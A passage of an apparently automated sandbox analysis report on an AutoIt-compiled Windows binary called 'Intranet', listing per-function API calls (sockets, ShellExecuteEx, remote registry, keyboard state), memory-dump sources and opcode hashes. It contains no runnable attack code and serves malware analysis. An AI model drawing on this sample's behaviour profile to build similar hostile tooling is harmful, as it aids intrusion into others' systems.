                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                            • String ID: Line %d: $AutoIt -
                                                                            • API String ID: 230667853-4094128768
                                                                            • Opcode ID: bd1e2fc3ab1ce7b67d3d2f9582ad9139cc801039c5dba51d9abcf4bc7877c7c0
                                                                            • Instruction ID: a58157c977bfa3a52b2f1ed9839fabc2283057b57ebac0e5adb51e993ac9afab
                                                                            • Opcode Fuzzy Hash: bd1e2fc3ab1ce7b67d3d2f9582ad9139cc801039c5dba51d9abcf4bc7877c7c0
                                                                            • Instruction Fuzzy Hash: D241D371008304AAD321EB64DCA5FEF77ECAF94358F40061FF185921A2DF789649C7AA
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00504802
                                                                            • LoadStringW.USER32(00000000), ref: 00504809
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0050481F
                                                                            • LoadStringW.USER32(00000000), ref: 00504826
                                                                            • _wprintf.LIBCMT ref: 0050484C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0050486A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00504847
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 6f2d3ff46684a76b1a034a46c6141c3d4ecd2b88752a6a7b12a9530960a5cf3b
                                                                            • Instruction ID: c801f5983cb9a02a95fb35ed9226a065fe4d9e7079e7309df9fc32f572cd85cd
                                                                            • Opcode Fuzzy Hash: 6f2d3ff46684a76b1a034a46c6141c3d4ecd2b88752a6a7b12a9530960a5cf3b
                                                                            • Instruction Fuzzy Hash: 7F01A7F28003087FE711A7909D99EF7776CEB08301F400595B709E2181E7349E888B74
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0052DB42
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0052DB62
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0052DD9D
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0052DDBB
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0052DDDC
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 0052DDFB
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0052DE20
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0052DE43
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 338976fa95bb169df5c4ef85d240efe255b4cb5096833115381d22fd23cf083a
                                                                            • Instruction ID: e9951b157e4e1e87b0ecb176235bb5291105e046003946486729cb05d5f1d91a
                                                                            • Opcode Fuzzy Hash: 338976fa95bb169df5c4ef85d240efe255b4cb5096833115381d22fd23cf083a
                                                                            • Instruction Fuzzy Hash: 86B19831600229ABDF14CF69D9897AE7BB1FF45701F098069EC48AF295D770A950CBA0
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052044E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3479070676-0
                                                                            • Opcode ID: 0f7e24e36ca40a3b73c95bc17f835b28aee4a2763490b03318cd3ac65de2bb26
                                                                            • Instruction ID: a09e9484cd8ee094440796b23f6eaec410e8e846207eda17950eac8838ab32dd
                                                                            • Opcode Fuzzy Hash: 0f7e24e36ca40a3b73c95bc17f835b28aee4a2763490b03318cd3ac65de2bb26
                                                                            • Instruction Fuzzy Hash: CBA19A302042119FCB14EF25D895B6EBBE5BF85318F04881EF5968B2E2DB39E945CF46
                                                                            APIs
                                                                            • ShowWindow.USER32(?,?,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004A2E9F
                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000,000000FF), ref: 004A2EE7
                                                                            • ShowWindow.USER32(?,00000006,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004DC55B
                                                                            • ShowWindow.USER32(?,?,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004DC5C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: a55e20193b12c40e5220d6ff80b3d6a838a9d7c23f40ad226ecb89d21ee171ed
                                                                            • Instruction ID: f7ab68529219856b3cadbdfd9b81c98ce2ca39ee9835382a589ee07caf4153fd
                                                                            • Opcode Fuzzy Hash: a55e20193b12c40e5220d6ff80b3d6a838a9d7c23f40ad226ecb89d21ee171ed
                                                                            • Instruction Fuzzy Hash: D241C930604781AAC735472D9AE876B7B92ABB7300F14840FE447477A1C6BDA9C5F719
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00507698
                                                                              • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
                                                                              • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005076CF
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 005076EB
                                                                            • _memmove.LIBCMT ref: 00507739
                                                                            • _memmove.LIBCMT ref: 00507756
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00507765
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0050777A
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00507799
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: 43c1b8ffb6786d42e6ea34d836dc9e081b16881ddcb3b6066c44ee5edeec3614
                                                                            • Instruction ID: 952c82caf2fb463917db920443ef0325f5bf7415be7688eef29995b38b3006ff
                                                                            • Opcode Fuzzy Hash: 43c1b8ffb6786d42e6ea34d836dc9e081b16881ddcb3b6066c44ee5edeec3614
                                                                            • Instruction Fuzzy Hash: 6931AF35904208EBCB50EF65DC85E6FBB78FF45304B1440AAF904AB296D770EE54DBA4
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000,00000001,?,?,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526810
                                                                            • GetDC.USER32(00000000,00000001,?,?,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526818
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526823
                                                                            • ReleaseDC.USER32(00000000,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0052682F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0052686B
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0052687C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?), ref: 005268B6
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 005268D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 34c2bdf250f705ae42433422d5e7473a6c84b371461c631b206dc0728edfcb00
                                                                            • Instruction ID: e436f189b7c37deeb15487d9b9e74cdcf95aab788bc9c6a191910cfa6c1eb2b8
                                                                            • Opcode Fuzzy Hash: 34c2bdf250f705ae42433422d5e7473a6c84b371461c631b206dc0728edfcb00
                                                                            • Instruction Fuzzy Hash: 04315A72101224BFEB158F109C9AFAA3FADFF5A761F044065FE089A2D1C6759851DBB0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 00e4bbc8a889ff6dbb9c7716b5dc7f0b8580e24528d76dcb5fc59fcf9e62d5d3
                                                                            • Instruction ID: 99459ae71c59785c2da93630dba1415f8cc1d30b7990874d86fc41a8cc995cd2
                                                                            • Opcode Fuzzy Hash: 00e4bbc8a889ff6dbb9c7716b5dc7f0b8580e24528d76dcb5fc59fcf9e62d5d3
                                                                            • Instruction Fuzzy Hash: 3D21987670110E77D60475114FC2FBB779CAE15794F04402BFE06A6343E719DE1196AD
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • _wcstok.LIBCMT ref: 0050F2D7
                                                                            • _wcscpy.LIBCMT ref: 0050F366
                                                                            • _memset.LIBCMT ref: 0050F399
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            • Opcode ID: b2fe510dccdf7f6310f5e104a58d87f9e4fb746cab73f5e9f55bdddd366cad18
                                                                            • Instruction ID: 5ddb6fa67c1d699112b56bf8d9ad6d97d69395b38a45842a95fdde5b4b15af50
                                                                            • Opcode Fuzzy Hash: b2fe510dccdf7f6310f5e104a58d87f9e4fb746cab73f5e9f55bdddd366cad18
                                                                            • Instruction Fuzzy Hash: 8DC1BF715043419FC724EF25C895EAEBBE4BF85314F40492EF899872A2DB34EC05CB96
                                                                            APIs
                                                                            • #151.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005172EB
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0051730C
                                                                            • #111.WSOCK32(00000000), ref: 0051731F
                                                                            • #15.WSOCK32(?,?,?,00000000,?), ref: 005173D5
                                                                            • #11.WSOCK32(?), ref: 00517392
                                                                              • Part of subcall function 004FB4EA: _strlen.LIBCMT ref: 004FB4F4
                                                                              • Part of subcall function 004FB4EA: _memmove.LIBCMT ref: 004FB516
                                                                            • _strlen.LIBCMT ref: 0051742F
                                                                            • _memmove.LIBCMT ref: 00517498
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$#111#151
                                                                            • String ID:
                                                                            • API String ID: 2620998920-0
                                                                            • Opcode ID: db4c112d8ec167df85b4b27a365a94365c56a9eb0d8fb7c42f4302afbbb0ef5b
                                                                            • Instruction ID: 83971324a8b4fb03e482d39aa19efa695d813ca56dad41a7fcdfa5f701b1e6a5
                                                                            • Opcode Fuzzy Hash: db4c112d8ec167df85b4b27a365a94365c56a9eb0d8fb7c42f4302afbbb0ef5b
                                                                            • Instruction Fuzzy Hash: 1A81F171108304ABD710EB29DC91EAFBBB8EBD9318F10491DF5529B292DB74ED41CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eadf85dec5d24dd70506f3f6be7302bd1b446f124cc94962967fe3133d91ee78
                                                                            • Instruction ID: c750ade9cb711c178b29b97b13027f748f720487697e4a0b063ff136671709d3
                                                                            • Opcode Fuzzy Hash: eadf85dec5d24dd70506f3f6be7302bd1b446f124cc94962967fe3133d91ee78
                                                                            • Instruction Fuzzy Hash: C3717E30900109EFCB04DF59CC88EAFBB79FF96354F14815AF915AA361C7389A51DBA8
                                                                            APIs
                                                                            • IsWindow.USER32(?), ref: 0052BA5D
                                                                            • IsWindowEnabled.USER32(?), ref: 0052BA69
                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000,?,?,?,?,?,00000000), ref: 0052BB4D
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0052BB84
                                                                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 0052BBC1
                                                                            • GetWindowLongW.USER32(?,000000EC,?,?,?), ref: 0052BBE3
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0052BBFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: c24b9247b787c5149caf6180b8d685e52a6871dae11d07b669bd0c0a7d6c5f19
                                                                            • Instruction ID: 2082cbbdb5269bfd7b741eb7d523cd2fe47d1013396002bc29229cdad7c3f273
                                                                            • Opcode Fuzzy Hash: c24b9247b787c5149caf6180b8d685e52a6871dae11d07b669bd0c0a7d6c5f19
                                                                            • Instruction Fuzzy Hash: 4171AA34604225AFEB249F64E894FBABFB9FF5A300F004059E956972E1C731AD50DB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0051FB31
                                                                            • _memset.LIBCMT ref: 0051FBFA
                                                                            • ShellExecuteExW.SHELL32(?), ref: 0051FC3F
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • GetProcessId.KERNEL32(00000000), ref: 0051FCB6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0051FCE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: b65de5ffeb2538e706ab16c91873a808002b45fb5ece6f5293f058d4282701ce
                                                                            • Instruction ID: ada4c8dc9001b9e887b882979c2f7a3c682f2433fa31aa6a6d9bdc65fd7c34e4
                                                                            • Opcode Fuzzy Hash: b65de5ffeb2538e706ab16c91873a808002b45fb5ece6f5293f058d4282701ce
                                                                            • Instruction Fuzzy Hash: 6B61C175A006199FCB14EF65C4909EDBBF5FF49318F14846EE806AB351CB38AD81CB94
                                                                            APIs
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,004AAB12), ref: 004C07EC
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000010,00000000,?,?,?,004AAB12), ref: 004C07F4
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,004AAB12), ref: 004C07FF
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,004AAB12), ref: 004C080A
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000011,00000000,?,?,?,004AAB12), ref: 004C0812
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000012,00000000,?,?,?,004AAB12), ref: 004C081A
                                                                              • Part of subcall function 004BFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004AAC6B), ref: 004BFFA7
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004AAD08
                                                                            • OleInitialize.OLE32(00000000), ref: 004AAD85
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004E2F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: <wV$\tV$sV
                                                                            • API String ID: 1986988660-3499476272
                                                                            • Opcode ID: 286e0f5f2c041ace295fd425b05a0423e379b810ffedaf8171dd2189f3dcfaa4
                                                                            • Instruction ID: f8f7c48c610570c381a510069acb9275db8f7f676151f629a1725f909d81f222
                                                                            • Opcode Fuzzy Hash: 286e0f5f2c041ace295fd425b05a0423e379b810ffedaf8171dd2189f3dcfaa4
                                                                            • Instruction Fuzzy Hash: CA819AB09192488ECB84DF3EAD586557FE4FB6C30E71086AAD419C7371EBB44408EF65
                                                                            APIs
                                                                            • GetParent.USER32(?,?,?,00000011), ref: 0050178B
                                                                            • GetKeyboardState.USER32(?), ref: 005017A0
                                                                            • SetKeyboardState.USER32(?), ref: 00501801
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0050182F
